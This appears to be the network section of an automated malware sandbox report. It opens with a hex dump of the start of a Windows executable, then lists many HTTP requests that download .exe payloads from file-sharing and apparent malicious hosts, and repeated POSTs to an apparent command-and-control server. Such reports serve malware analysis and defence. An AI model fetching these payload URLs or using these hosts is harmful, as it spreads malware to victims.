                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.20.1Date: Fri, 14 Jan 2022 04:00:00 GMTContent-Type: application/x-msdos-programContent-Length: 3590568Connection: closeLast-Modified: Tue, 11 Jan 2022 09:57:59 GMTETag: "36c9a8-5d54b7cf63afc"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 09 00 ed 8e da 61 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 0e 1d 00 98 04 00 00 d0 02 00 00 00 00 00 00 30 02 00 00 10 00 00 00 b0 04 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 30 57 00 00 04 00 00 f6 34 38 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 7c 7c 52 00 20 01 00 00 00 c0 50 00 0d ab 01 00 00 00 00 00 00 00 00 00 00 a6 36 00 a8 23 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 43 18 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 80 02 00 00 30 02 00 00 7a 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 f0 00 00 00 b0 04 00 00 72 00 00 00 7e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 20 00 00 00 a0 05 00 00 04 00 00 00 f0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 13 29 18 00 00 c0 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 d0 32 00 00 f0 1d 00 00 c8 2f 00 00 f4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 00 b0 01 00 00 c0 50 00 00 3a 01 00 00 bc 30 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 50 6c 37 71 52 37 68 00 b0 04 00 00 70 52 00 00 b0 04 00 00 f6 31 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 61 64 61 74 61 00 00 00 10 00 00 00 20 57 00 00 00 00 00 00 a6 36 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                          Source: global trafficHTTP traffic detected: GET /32739433.dat?iddqd=1 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 185.233.81.115
                          Source: global trafficHTTP traffic detected: GET /attachments/903666793514672200/930134152861343815/Nidifying.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: cdn.discordapp.com
                          Source: global trafficHTTP traffic detected: GET /abhF HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: goo.su
                          Source: global trafficHTTP traffic detected: GET /get/QbPlFD/G.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: transfer.sh
                          Source: global trafficHTTP traffic detected: GET /get/uq3XSe/5.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: transfer.sh
                          Source: global trafficHTTP traffic detected: GET /get/uq3XSe/5.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: transfer.sh
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://qlxnfuhj.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 296Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://fggjhikg.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 360Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://slshljche.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 340Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://fqtuljhoii.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 157Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://rmdwdmn.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 242Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://hmirsmb.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 154Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://njsnp.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 310Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://rksnlek.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 218Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: GET /files/9030_1641816409_7037.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: data-host-coin-8.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://hxaovqrpb.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 205Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://afnhk.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 207Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://uyqwcjxbf.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 267Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://bncatspln.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 349Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://bwonexybi.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 262Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: GET /install5.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: unicupload.top
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://sworutss.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 124Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://drlfnir.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 357Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://rvqyadtl.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 355Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://irhpoqhlc.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 165Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: GET /game.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: data-host-coin-8.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://xpbxi.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 320Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://wefker.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 342Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://kyelhwx.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 252Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://gbuig.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 140Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: GET /6.php HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 185.7.214.171:8080
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jjjeal.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 121Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://kllxbylc.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 143Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://iqiollry.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 356Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://lxvicbnfu.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 180Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://alysw.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 249Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://yocfbwydo.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 181Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://gempx.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 266Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://cnwtvll.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 350Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ecigcmyd.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 279Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://qaicqimmrp.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 340Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://lwrsn.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 157Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://lqdvrak.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 151Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://scugxyrh.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 255Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://lwwgdj.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 269Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://umttqygm.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 209Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://dujdgqdl.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 199Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://acontkk.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 334Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://rwkvcn.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 355Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://urrhyr.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 155Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: GET /files/6961_1642089187_2359.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: data-host-coin-8.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://bqqdf.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 333Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://dcbwcxee.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 125Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://vwrxdxe.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 345Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://kijlaf.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 236Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://xbgcbdcvsv.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 299Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://kvaxa.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 235Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://wferj.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 138Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: GET /files/8474_1641976243_3082.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: data-host-coin-8.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jkhktrj.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 157Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://uiswqsy.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 216Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: GET /9.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: a0621298.xsph.ru
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://otiidv.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 247Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://adiacegte.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 320Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://kxdhsiskb.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 196Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://wuqrydcob.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 343Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://khptceilp.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 301Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://teeekh.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 320Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://rhggaprrm.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 320Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://rrvxdibqv.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 355Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: GET /files/6961_1642089187_2359.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: data-host-coin-8.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://hcsfipgmy.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 336Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ygjqjael.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 292Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: GET /files/7729_1642101604_1835.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: data-host-coin-8.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ijclu.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 339Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://abuneept.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 197Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: GET /7.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: a0621298.xsph.ru
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://klaqrtvjum.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 305Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://veccr.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 115Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://egxhxygmwb.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 193Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://qcruxq.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 193Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: GET /files/9042_1641895079_9876.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: data-host-coin-8.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jurgfiow.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 158Host: host-data-coin-11.com
                          Source: global trafficTCP traffic: 192.168.2.3:49789 -> 185.7.214.171:8080
                          Source: global trafficTCP traffic: 192.168.2.3:49886 -> 86.107.197.138:38133
                          Source: 7D0A.exe, 00000025.00000002.524328614.0000000002EED000.00000004.00000001.sdmpString found in binary or memory: https://www.facebook.com/chat/video/videocalldownload.php
                          Source: 7D0A.exe, 00000025.00000002.523253822.0000000002B84000.00000004.00000001.sdmp, 7D0A.exe, 00000025.00000002.523539802.0000000002CAE000.00000004.00000001.sdmp, 7D0A.exe, 00000025.00000002.524054463.0000000002E2D000.00000004.00000001.sdmp, 7D0A.exe, 00000025.00000002.524328614.0000000002EED000.00000004.00000001.sdmpString found in binary or memory: http://appldnld.apple.com/QuickTime/041-3089.20111026.Sxpr4/QuickTimeInstaller.exe
